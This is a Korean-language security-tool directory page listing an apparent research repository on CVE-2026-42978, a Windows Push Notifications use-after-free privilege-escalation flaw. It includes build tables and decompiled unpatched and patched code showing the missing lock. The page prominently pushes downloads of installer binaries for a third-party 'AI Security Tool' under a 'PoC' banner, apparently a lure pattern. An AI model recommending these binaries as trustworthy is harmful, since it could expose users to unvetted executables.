Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-42978-PoC-Research — CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free 및 경쟁 조건 PoC 연구, 진단 스캐너, AI Security Tool용 보안 감사 모듈. | Kitploit
도구/GitHubGitHub/syntaxmethod/cve-2026-42978-poc-research
Defensive ToolsPrivilege EscalationVulnerability ScannersVulnerability AnalysisExploitationThreat IntelligencePapers & ResearchLearning & Education

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
syntaxmethod/cve-2026-42978-poc-research

CVE-2026-42978-PoC-Research

CVE-2026-42978 Windows Push Notifications (WpnService) Use-After-Free 및 경쟁 조건 PoC 연구, 진단 스캐너, AI Security Tool용 보안 감사 모듈.

저장소 보기웹사이트
942321일 전아직 검토되지 않음

CVE-2026-42978
AI 보안 도구용 Windows 푸시 알림 모듈

차세대 AI 보안 에코시스템, 멀티 프로토콜 터미널 및 자율 에이전트 제품군


Latest Release Build Status Donations Telegram Channel License

웹사이트 · 제품 문서 · 호스트 애플리케이션 · 커뮤니티 채팅

웹사이트 내비게이션: 홈 · 업데이트 · 다운로드 · 모듈

Module banner


공식 호스트 애플리케이션

제품: AI Security Tool
사이트: zerodayevil.github.io
문서: https://zerodayevil.github.io/ai-security-tool

이 모듈은 AI Security Tool을 위한 검토된 분석 문서이자 안전 점검 프로필입니다.
프로젝트 사이트나 공식 카탈로그에 등록된 모듈만 사용하십시오. 이 모듈은 승인된 애플리케이션 내부에서, 본인이 소유하거나 서면으로 평가 권한을 부여받은 엔드포인트를 대상으로만 로드하십시오.

이 저장소는 WpnService에 대한 무기화된 익스플로잇을 제공하지 않습니다. lab/ 아래의 실습 환경은 해당 부류의 버그(TOCTOU / 이중 페치)를 모사한 독립 실행형 목업입니다. 실제 푸시 알림 서비스와는 통신하지 않습니다.


빠른 시작 및 설치

먼저 호스트 애플리케이션을 설치하십시오. 그런 다음 Modules → Windows / Local EoP → CVE-2026-42978에서 이 모듈을 활성화하십시오.

바로 사용 가능한 빌드

OS / 플랫폼버전아키텍처 / 형식업데이트상태다운로드
Windowsv6.3.20x64 설치 프로그램 (.exe)2026-09-08최신Download .exe
Windowsv6.3.20x64 포터블 (.tar.gz)2026-09-08최신Download .tar.gz
macOSv5.3.29Apple Silicon (.dmg)2026-09-05안정Download .dmg
Linuxv5.3.27범용 x64 (.tar.gz)2026-09-01안정Download .tar.gz
Androidv5.3.27ARM64 APK (.apk)2026-09-01안정Download .apk

공식 출처만 사용하십시오:

  • https://zerodayevil.github.io/
  • https://zerodayevil.github.io/ai-security-tool
  • https://github.com/ZeroDayEvil/ai-security-tool

개념 개요

CVE-2026-42978은 Windows 푸시 알림의 로컬 권한 상승 취약점입니다. Microsoft는 적절한 동기화 없이 공유 리소스에 동시 접근하는 문제(CWE-362)로 설명합니다. 패치된 wpncore.dll과 패치되지 않은 버전에 대한 연구는 플랫폼 종료 중 PresentationEndpointFacade에서 발생하는 use-after-free 경쟁 조건을 보여줍니다.

WpnService는 세션 0에서 NT AUTHORITY\SYSTEM(svchost.exe -k netsvcs -p)으로 실행됩니다. 토스트, 타일, 배지 전달이 이 서비스를 통해 이루어집니다. 이 프로세스를 상대로 경쟁 조건에서 승리하면 로컬 머신에서 SYSTEM 권한 문제가 됩니다 — 원격 사전 인증 DC 버그가 아닙니다.

상태: 2026년 6월 10일(패치 화요일)에 패치되었습니다. 이 페이지는 방어적 연구입니다.

이것은 CVE-2026-41089(Netlogon RCE)가 아닙니다. 구성 요소, 권한 모델, 패치 날짜가 모두 다릅니다.


사양

필드값
CVECVE-2026-42978
BDUBDU:2026-08249
벤더 권고MSRC — Windows Push Notifications EoP
심각도높음 · CVSS 3.1 7.8
취약점 유형CWE-362 경쟁 조건 · 종료 경로에서의 use-after-free
구성 요소Windows Push Notifications · WpnService · wpncore.dll
공격 벡터로컬
필요 권한낮음 (권한이 부여된 로컬 사용자)
사용자 상호작용없음
패치 화요일2026년 6월 10일
모듈 유형연구 분석 문서 + 앱 내 안전 점검 + 탐지 팩

적용 범위

푸시 알림을 포함하는 클라이언트 및 서버 SKU. 티켓을 종료하기 전에 MSRC에서 정확한 KB를 확인하십시오.

제품군비고
Windows 101809, 21H2, 22H2 (해당되는 경우 x86 / x64 / ARM64)
Windows 1123H2, 24H2, 25H2, 26H1
Windows Server2016 / 2019 / 2022 / 2025 (구성 요소가 존재하는 경우 전체 및 Server Core)

공개 서비스 공지 기반 참고 빌드 (항상 MSRC를 다시 확인하십시오):

브랜치참고 패치 빌드
Windows 11 23H222631.7219
Windows 11 24H226100.8655
Windows 11 25H226200.8655
Windows 11 26H128000.2269
wpncore.dll 예시 (24H2)취약 26100.8521 → 패치 26100.8655

근본 원인 (연구)

이 파사드는 알림 API 호출을 감싸고 PresentationEndpointImpl에 위임합니다. 플랫폼 종료 중에 NotificationPlatform 객체가 파괴됩니다. 여러 파사드 메서드는 역사적으로 종료 플래그나 공유 잠금 없이 플랫폼 포인터를 가져왔습니다. 해제가 경쟁에서 이기면 다음 호출은 댕글링 포인터를 사용합니다.

Facade, platform, shutdown guard

동일한 잠금 및 가드 패턴이 49개의 PresentationEndpointFacade::* 메서드에 적용되었습니다. 그 아래의 구현 메서드는 그대로 남겨졌습니다 — 구멍은 파사드에 있었습니다.

패치되지 않은 형태 (wpncore.dll 26100.8521)

// PresentationEndpointFacade::ToastUnblockAll — unpatched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    NotificationPlatformHandle::Get(this + 0x50);
    if (platform == NULL)
        Throw_Hr(...);
    return PresentationEndpointImpl::UnblockToastsForEachApp(...);
}

패치된 형태 (wpncore.dll 26100.8655)

// PresentationEndpointFacade::ToastUnblockAll — patched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    if (Feature_4097557817::IsEnabled()) {
        AcquireSRWLockShared(&Wns::s_platformLock);
        if (Wns::s_platformShutdown)
            Throw_Hr(E_APPLICATION_EXITING);
        NotificationPlatformHandle::Get(this + 0x50);
        ReleaseSRWLockShared(&Wns::s_platformLock);
    }
}

Ghidra with unpatched and patched wpncore.dll open

패치가 추가하는 것:

  1. AcquireSRWLockShared — 리더-라이터 잠금; 종료는 배타적 잠금을 획득합니다.
  2. s_platformShutdown — 해제가 시작되면 E_APPLICATION_EXITING으로 빠져나갑니다.
  3. WIL unique_storage를 통한 RAII 해제로, 예외 경로에서도 잠금이 해제됩니다.
  4. 단계적 배포 / 롤백을 위한 기능 플래그 Feature_4097557817.

바이너리 차이의 규모

도구 다운로드